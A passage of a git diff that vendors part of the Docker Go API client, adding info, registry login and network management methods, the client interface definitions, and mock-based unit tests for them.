+		err := client.ImageTag(context.Background(), "image_id", tagCase.reference)
+		if err != nil {
+			t.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/info.go b/vendor/github.com/docker/docker/client/info.go
new file mode 100644
index 0000000000..ac07961224
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/info.go
@@ -0,0 +1,26 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// Info returns information about the docker server.
+func (cli *Client) Info(ctx context.Context) (types.Info, error) {
+	var info types.Info
+	serverResp, err := cli.get(ctx, "/info", url.Values{}, nil)
+	if err != nil {
+		return info, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&info); err != nil {
+		return info, fmt.Errorf("Error reading remote info: %v", err)
+	}
+
+	return info, nil
+}
diff --git a/vendor/github.com/docker/docker/client/info_test.go b/vendor/github.com/docker/docker/client/info_test.go
new file mode 100644
index 0000000000..79f23c8af2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/info_test.go
@@ -0,0 +1,76 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestInfoServerError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.Info(context.Background())
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestInfoInvalidResponseJSONError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("invalid json"))),
+			}, nil
+		}),
+	}
+	_, err := client.Info(context.Background())
+	if err == nil || !strings.Contains(err.Error(), "invalid character") {
+		t.Fatalf("expected a 'invalid character' error, got %v", err)
+	}
+}
+
+func TestInfo(t *testing.T) {
+	expectedURL := "/info"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			info := &types.Info{
+				ID:         "daemonID",
+				Containers: 3,
+			}
+			b, err := json.Marshal(info)
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	info, err := client.Info(context.Background())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if info.ID != "daemonID" {
+		t.Fatalf("expected daemonID, got %s", info.ID)
+	}
+
+	if info.Containers != 3 {
+		t.Fatalf("expected 3 containers, got %d", info.Containers)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/interface.go b/vendor/github.com/docker/docker/client/interface.go
new file mode 100644
index 0000000000..05978039b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/interface.go
@@ -0,0 +1,171 @@
+package client
+
+import (
+	"io"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/api/types/swarm"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"golang.org/x/net/context"
+)
+
+// CommonAPIClient is the common methods between stable and experimental versions of APIClient.
+type CommonAPIClient interface {
+	ContainerAPIClient
+	ImageAPIClient
+	NodeAPIClient
+	NetworkAPIClient
+	PluginAPIClient
+	ServiceAPIClient
+	SwarmAPIClient
+	SecretAPIClient
+	SystemAPIClient
+	VolumeAPIClient
+	ClientVersion() string
+	ServerVersion(ctx context.Context) (types.Version, error)
+	UpdateClientVersion(v string)
+}
+
+// ContainerAPIClient defines API client methods for the containers
+type ContainerAPIClient interface {
+	ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error)
+	ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error)
+	ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error)
+	ContainerDiff(ctx context.Context, container string) ([]types.ContainerChange, error)
+	ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error)
+	ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error)
+	ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error)
+	ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error
+	ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error
+	ContainerExport(ctx context.Context, container string) (io.ReadCloser, error)
+	ContainerInspect(ctx context.Context, container string) (types.ContainerJSON, error)
+	ContainerInspectWithRaw(ctx context.Context, container string, getSize bool) (types.ContainerJSON, []byte, error)
+	ContainerKill(ctx context.Context, container, signal string) error
+	ContainerList(ctx context.Context, options types.ContainerListOptions) ([]types.Container, error)
+	ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error)
+	ContainerPause(ctx context.Context, container string) error
+	ContainerRemove(ctx context.Context, container string, options types.ContainerRemoveOptions) error
+	ContainerRename(ctx context.Context, container, newContainerName string) error
+	ContainerResize(ctx context.Context, container string, options types.ResizeOptions) error
+	ContainerRestart(ctx context.Context, container string, timeout *time.Duration) error
+	ContainerStatPath(ctx context.Context, container, path string) (types.ContainerPathStat, error)
+	ContainerStats(ctx context.Context, container string, stream bool) (types.ContainerStats, error)
+	ContainerStart(ctx context.Context, container string, options types.ContainerStartOptions) error
+	ContainerStop(ctx context.Context, container string, timeout *time.Duration) error
+	ContainerTop(ctx context.Context, container string, arguments []string) (types.ContainerProcessList, error)
+	ContainerUnpause(ctx context.Context, container string) error
+	ContainerUpdate(ctx context.Context, container string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error)
+	ContainerWait(ctx context.Context, container string) (int64, error)
+	CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error)
+	CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error
+	ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error)
+}
+
+// ImageAPIClient defines API client methods for the images
+type ImageAPIClient interface {
+	ImageBuild(ctx context.Context, context io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error)
+	ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error)
+	ImageHistory(ctx context.Context, image string) ([]types.ImageHistory, error)
+	ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error)
+	ImageInspectWithRaw(ctx context.Context, image string) (types.ImageInspect, []byte, error)
+	ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error)
+	ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error)
+	ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error)
+	ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error)
+	ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDelete, error)
+	ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error)
+	ImageSave(ctx context.Context, images []string) (io.ReadCloser, error)
+	ImageTag(ctx context.Context, image, ref string) error
+	ImagesPrune(ctx context.Context, pruneFilter filters.Args) (types.ImagesPruneReport, error)
+}
+
+// NetworkAPIClient defines API client methods for the networks
+type NetworkAPIClient interface {
+	NetworkConnect(ctx context.Context, networkID, container string, config *network.EndpointSettings) error
+	NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error)
+	NetworkDisconnect(ctx context.Context, networkID, container string, force bool) error
+	NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error)
+	NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error)
+	NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error)
+	NetworkRemove(ctx context.Context, networkID string) error
+	NetworksPrune(ctx context.Context, pruneFilter filters.Args) (types.NetworksPruneReport, error)
+}
+
+// NodeAPIClient defines API client methods for the nodes
+type NodeAPIClient interface {
+	NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error)
+	NodeList(ctx context.Context, options types.NodeListOptions) ([]swarm.Node, error)
+	NodeRemove(ctx context.Context, nodeID string, options types.NodeRemoveOptions) error
+	NodeUpdate(ctx context.Context, nodeID string, version swarm.Version, node swarm.NodeSpec) error
+}
+
+// PluginAPIClient defines API client methods for the plugins
+type PluginAPIClient interface {
+	PluginList(ctx context.Context) (types.PluginsListResponse, error)
+	PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error
+	PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error
+	PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error
+	PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (io.ReadCloser, error)
+	PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (io.ReadCloser, error)
+	PluginPush(ctx context.Context, name string, registryAuth string) (io.ReadCloser, error)
+	PluginSet(ctx context.Context, name string, args []string) error
+	PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error)
+	PluginCreate(ctx context.Context, createContext io.Reader, options types.PluginCreateOptions) error
+}
+
+// ServiceAPIClient defines API client methods for the services
+type ServiceAPIClient interface {
+	ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error)
+	ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error)
+	ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error)
+	ServiceRemove(ctx context.Context, serviceID string) error
+	ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error)
+	ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error)
+	TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error)
+	TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error)
+}
+
+// SwarmAPIClient defines API client methods for the swarm
+type SwarmAPIClient interface {
+	SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error)
+	SwarmJoin(ctx context.Context, req swarm.JoinRequest) error
+	SwarmGetUnlockKey(ctx context.Context) (types.SwarmUnlockKeyResponse, error)
+	SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error
+	SwarmLeave(ctx context.Context, force bool) error
+	SwarmInspect(ctx context.Context) (swarm.Swarm, error)
+	SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error
+}
+
+// SystemAPIClient defines API client methods for the system
+type SystemAPIClient interface {
+	Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error)
+	Info(ctx context.Context) (types.Info, error)
+	RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error)
+	DiskUsage(ctx context.Context) (types.DiskUsage, error)
+	Ping(ctx context.Context) (types.Ping, error)
+}
+
+// VolumeAPIClient defines API client methods for the volumes
+type VolumeAPIClient interface {
+	VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error)
+	VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error)
+	VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error)
+	VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error)
+	VolumeRemove(ctx context.Context, volumeID string, force bool) error
+	VolumesPrune(ctx context.Context, pruneFilter filters.Args) (types.VolumesPruneReport, error)
+}
+
+// SecretAPIClient defines API client methods for secrets
+type SecretAPIClient interface {
+	SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error)
+	SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error)
+	SecretRemove(ctx context.Context, id string) error
+	SecretInspectWithRaw(ctx context.Context, name string) (swarm.Secret, []byte, error)
+	SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error
+}
diff --git a/vendor/github.com/docker/docker/client/interface_experimental.go b/vendor/github.com/docker/docker/client/interface_experimental.go
new file mode 100644
index 0000000000..51da98ecdd
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/interface_experimental.go
@@ -0,0 +1,17 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+type apiClientExperimental interface {
+	CheckpointAPIClient
+}
+
+// CheckpointAPIClient defines API client methods for the checkpoints
+type CheckpointAPIClient interface {
+	CheckpointCreate(ctx context.Context, container string, options types.CheckpointCreateOptions) error
+	CheckpointDelete(ctx context.Context, container string, options types.CheckpointDeleteOptions) error
+	CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error)
+}
diff --git a/vendor/github.com/docker/docker/client/interface_stable.go b/vendor/github.com/docker/docker/client/interface_stable.go
new file mode 100644
index 0000000000..cc90a3cbb9
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/interface_stable.go
@@ -0,0 +1,10 @@
+package client
+
+// APIClient is an interface that clients that talk with a docker server must implement.
+type APIClient interface {
+	CommonAPIClient
+	apiClientExperimental
+}
+
+// Ensure that Client always implements APIClient.
+var _ APIClient = &Client{}
diff --git a/vendor/github.com/docker/docker/client/login.go b/vendor/github.com/docker/docker/client/login.go
new file mode 100644
index 0000000000..600dc7196f
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/login.go
@@ -0,0 +1,29 @@
+package client
+
+import (
+	"encoding/json"
+	"net/http"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/registry"
+	"golang.org/x/net/context"
+)
+
+// RegistryLogin authenticates the docker server with a given docker registry.
+// It returns UnauthorizerError when the authentication fails.
+func (cli *Client) RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) {
+	resp, err := cli.post(ctx, "/auth", url.Values{}, auth, nil)
+
+	if resp.statusCode == http.StatusUnauthorized {
+		return registry.AuthenticateOKBody{}, unauthorizedError{err}
+	}
+	if err != nil {
+		return registry.AuthenticateOKBody{}, err
+	}
+
+	var response registry.AuthenticateOKBody
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/network_connect.go b/vendor/github.com/docker/docker/client/network_connect.go
new file mode 100644
index 0000000000..c022c17b5b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_connect.go
@@ -0,0 +1,18 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	"golang.org/x/net/context"
+)
+
+// NetworkConnect connects a container to an existent network in the docker host.
+func (cli *Client) NetworkConnect(ctx context.Context, networkID, containerID string, config *network.EndpointSettings) error {
+	nc := types.NetworkConnect{
+		Container:      containerID,
+		EndpointConfig: config,
+	}
+	resp, err := cli.post(ctx, "/networks/"+networkID+"/connect", nil, nc, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/network_connect_test.go b/vendor/github.com/docker/docker/client/network_connect_test.go
new file mode 100644
index 0000000000..d472f4520c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_connect_test.go
@@ -0,0 +1,107 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+)
+
+func TestNetworkConnectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.NetworkConnect(context.Background(), "network_id", "container_id", nil)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworkConnectEmptyNilEndpointSettings(t *testing.T) {
+	expectedURL := "/networks/network_id/connect"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+
+			var connect types.NetworkConnect
+			if err := json.NewDecoder(req.Body).Decode(&connect); err != nil {
+				return nil, err
+			}
+
+			if connect.Container != "container_id" {
+				return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container)
+			}
+
+			if connect.EndpointConfig != nil {
+				return nil, fmt.Errorf("expected connect.EndpointConfig to be nil, got %v", connect.EndpointConfig)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.NetworkConnect(context.Background(), "network_id", "container_id", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestNetworkConnect(t *testing.T) {
+	expectedURL := "/networks/network_id/connect"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+
+			var connect types.NetworkConnect
+			if err := json.NewDecoder(req.Body).Decode(&connect); err != nil {
+				return nil, err
+			}
+
+			if connect.Container != "container_id" {
+				return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container)
+			}
+
+			if connect.EndpointConfig.NetworkID != "NetworkID" {
+				return nil, fmt.Errorf("expected 'NetworkID', got %s", connect.EndpointConfig.NetworkID)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.NetworkConnect(context.Background(), "network_id", "container_id", &network.EndpointSettings{
+		NetworkID: "NetworkID",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/network_create.go b/vendor/github.com/docker/docker/client/network_create.go
new file mode 100644
index 0000000000..4067a541ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_create.go
@@ -0,0 +1,25 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// NetworkCreate creates a new network in the docker host.
+func (cli *Client) NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) {
+	networkCreateRequest := types.NetworkCreateRequest{
+		NetworkCreate: options,
+		Name:          name,
+	}
+	var response types.NetworkCreateResponse
+	serverResp, err := cli.post(ctx, "/networks/create", nil, networkCreateRequest, nil)
+	if err != nil {
+		return response, err
+	}
+
+	json.NewDecoder(serverResp.body).Decode(&response)
+	ensureReaderClosed(serverResp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/network_create_test.go b/vendor/github.com/docker/docker/client/network_create_test.go
new file mode 100644
index 0000000000..0e2457f89c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_create_test.go
@@ -0,0 +1,72 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestNetworkCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.NetworkCreate(context.Background(), "mynetwork", types.NetworkCreate{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworkCreate(t *testing.T) {
+	expectedURL := "/networks/create"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+
+			content, err := json.Marshal(types.NetworkCreateResponse{
+				ID:      "network_id",
+				Warning: "warning",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	networkResponse, err := client.NetworkCreate(context.Background(), "mynetwork", types.NetworkCreate{
+		CheckDuplicate: true,
+		Driver:         "mydriver",
+		EnableIPv6:     true,
+		Internal:       true,
+		Options: map[string]string{
+			"opt-key": "opt-value",
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if networkResponse.ID != "network_id" {
+		t.Fatalf("expected networkResponse.ID to be 'network_id', got %s", networkResponse.ID)
+	}
+	if networkResponse.Warning != "warning" {
+		t.Fatalf("expected networkResponse.Warning to be 'warning', got %s", networkResponse.Warning)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/network_disconnect.go b/vendor/github.com/docker/docker/client/network_disconnect.go
new file mode 100644
index 0000000000..24b58e3c12
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_disconnect.go
@@ -0,0 +1,14 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// NetworkDisconnect disconnects a container from an existent network in the docker host.
+func (cli *Client) NetworkDisconnect(ctx context.Context, networkID, containerID string, force bool) error {
+	nd := types.NetworkDisconnect{Container: containerID, Force: force}
+	resp, err := cli.post(ctx, "/networks/"+networkID+"/disconnect", nil, nd, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/network_disconnect_test.go b/vendor/github.com/docker/docker/client/network_disconnect_test.go
new file mode 100644
index 0000000000..b54a2b1ccf
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_disconnect_test.go
@@ -0,0 +1,64 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestNetworkDisconnectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.NetworkDisconnect(context.Background(), "network_id", "container_id", false)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworkDisconnect(t *testing.T) {
+	expectedURL := "/networks/network_id/disconnect"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+
+			var disconnect types.NetworkDisconnect
+			if err := json.NewDecoder(req.Body).Decode(&disconnect); err != nil {
+				return nil, err
+			}
+
+			if disconnect.Container != "container_id" {
+				return nil, fmt.Errorf("expected 'container_id', got %s", disconnect.Container)
+			}
+
+			if !disconnect.Force {
+				return nil, fmt.Errorf("expected Force to be true, got %v", disconnect.Force)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.NetworkDisconnect(context.Background(), "network_id", "container_id", true)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/network_inspect.go b/vendor/github.com/docker/docker/client/network_inspect.go
new file mode 100644
index 0000000000..5ad4ea5bf3
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_inspect.go
@@ -0,0 +1,38 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// NetworkInspect returns the information for a specific network configured in the docker host.
+func (cli *Client) NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) {
+	networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID)
+	return networkResource, err
+}
+
+// NetworkInspectWithRaw returns the information for a specific network configured in the docker host and its raw representation.
+func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) {
+	var networkResource types.NetworkResource
+	resp, err := cli.get(ctx, "/networks/"+networkID, nil, nil)
+	if err != nil {
+		if resp.statusCode == http.StatusNotFound {
+			return networkResource, nil, networkNotFoundError{networkID}
+		}
+		return networkResource, nil, err
+	}
+	defer ensureReaderClosed(resp)
+
+	body, err := ioutil.ReadAll(resp.body)
+	if err != nil {
+		return networkResource, nil, err
+	}
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&networkResource)
+	return networkResource, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/network_inspect_test.go b/vendor/github.com/docker/docker/client/network_inspect_test.go
new file mode 100644
index 0000000000..1f926d66ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_inspect_test.go
@@ -0,0 +1,69 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestNetworkInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.NetworkInspect(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworkInspectContainerNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, err := client.NetworkInspect(context.Background(), "unknown")
+	if err == nil || !IsErrNetworkNotFound(err) {
+		t.Fatalf("expected a containerNotFound error, got %v", err)
+	}
+}
+
+func TestNetworkInspect(t *testing.T) {
+	expectedURL := "/networks/network_id"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "GET" {
+				return nil, fmt.Errorf("expected GET method, got %s", req.Method)
+			}
+
+			content, err := json.Marshal(types.NetworkResource{
+				Name: "mynetwork",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	r, err := client.NetworkInspect(context.Background(), "network_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.Name != "mynetwork" {
+		t.Fatalf("expected `mynetwork`, got %s", r.Name)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/network_list.go b/vendor/github.com/docker/docker/client/network_list.go
new file mode 100644
index 0000000000..e566a93e23
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_list.go
@@ -0,0 +1,31 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// NetworkList returns the list of networks configured in the docker host.
+func (cli *Client) NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) {
+	query := url.Values{}
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParamWithVersion(cli.version, options.Filters)
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+	var networkResources []types.NetworkResource
+	resp, err := cli.get(ctx, "/networks", query, nil)
+	if err != nil {
+		return networkResources, err
+	}
+	err = json.NewDecoder(resp.body).Decode(&networkResources)
+	ensureReaderClosed(resp)
+	return networkResources, err
+}
diff --git a/vendor/github.com/docker/docker/client/network_list_test.go b/vendor/github.com/docker/docker/client/network_list_test.go
new file mode 100644
index 0000000000..4d443496ac
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_list_test.go
@@ -0,0 +1,108 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+func TestNetworkListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.NetworkList(context.Background(), types.NetworkListOptions{
+		Filters: filters.NewArgs(),
+	})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
